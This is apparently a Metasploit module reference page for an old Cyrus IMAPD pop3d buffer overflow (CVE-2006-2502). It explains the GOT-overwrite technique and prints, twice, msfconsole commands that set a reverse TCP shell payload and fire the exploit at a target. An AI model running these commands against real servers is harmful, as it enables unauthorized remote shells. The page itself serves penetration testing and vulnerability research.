Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement
Exploit Rank
- Normal
Exploit Authors
- bannedit < bannedit [at] metasploit.com >
- jduck < jduck [at] metasploit.com >
Vulnerability References
- CVE-2006-2502
- OSVDB-25853
- BID-18056
- EDB-2053
- EDB-2185
- http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html
Exploit Targets
- 0 - Gentoo 2006.0 Linux 2.6 (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders
msf exploit(cyrus_pop3d_popsubfolders) > show payloads
msf exploit(cyrus_pop3d_popsubfolders) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(cyrus_pop3d_popsubfolders) > set LHOST [MY IP ADDRESS]
msf exploit(cyrus_pop3d_popsubfolders) > set RHOST [TARGET IP]
msf exploit(cyrus_pop3d_popsubfolders) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders
msf exploit(cyrus_pop3d_popsubfolders) > show payloads
msf exploit(cyrus_pop3d_popsubfolders) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(cyrus_pop3d_popsubfolders) > set LHOST [MY IP ADDRESS]
msf exploit(cyrus_pop3d_popsubfolders) > set RHOST [TARGET IP]
msf exploit(cyrus_pop3d_popsubfolders) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 110) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |